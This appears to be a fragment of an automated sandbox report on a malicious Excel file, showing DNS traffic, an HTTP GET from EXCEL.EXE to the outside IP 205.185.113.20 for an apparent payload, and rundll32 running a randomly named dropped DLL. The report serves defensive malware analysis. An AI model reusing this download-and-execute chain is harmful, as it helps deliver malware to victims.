                                                                                                                                                    Nov 19, 2020 07:14:10.794300079 CET5917253192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:14:10.807286024 CET53591728.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:14:11.238181114 CET6242053192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:14:11.251219988 CET53624208.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:14:11.921637058 CET6057953192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:14:11.935221910 CET53605798.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:14:12.586395025 CET5018353192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:14:12.599502087 CET53501838.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:14:13.003241062 CET6153153192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:14:13.016192913 CET53615318.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:14:22.911904097 CET4922853192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:14:22.925147057 CET53492288.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:14:23.625830889 CET5979453192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:14:23.652034998 CET53597948.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:14:27.248845100 CET5591653192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:14:27.267574072 CET53559168.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:15:00.574843884 CET5275253192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:15:00.587692976 CET53527528.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:15:02.543252945 CET6054253192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:15:02.556935072 CET53605428.8.8.8192.168.2.4

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • 205.185.113.20

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.449730205.185.113.2080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 19, 2020 07:13:37.637028933 CET264OUTGET /BVd1qKwd HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: 205.185.113.20
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Nov 19, 2020 07:13:37.807643890 CET271INHTTP/1.1 404 Not Found
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Thu, 19 Nov 2020 06:13:37 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0
                                                                                                                                                    Expires: 0
                                                                                                                                                    Last-Modified: Thu, 19 Nov 2020 06:13:37 GMT
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: _subid=1p924021ov5;Expires=Sunday, 20-Dec-2020 06:13:37 GMT;Max-Age=2678400;Path=/
                                                                                                                                                    Vary: Accept-Encoding


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:07:13:31
                                                                                                                                                    Start date:19/11/2020
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0x1160000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:07:13:38
                                                                                                                                                    Start date:19/11/2020
                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
                                                                                                                                                    Imagebase:0xf90000
                                                                                                                                                    File size:61952 bytes
                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >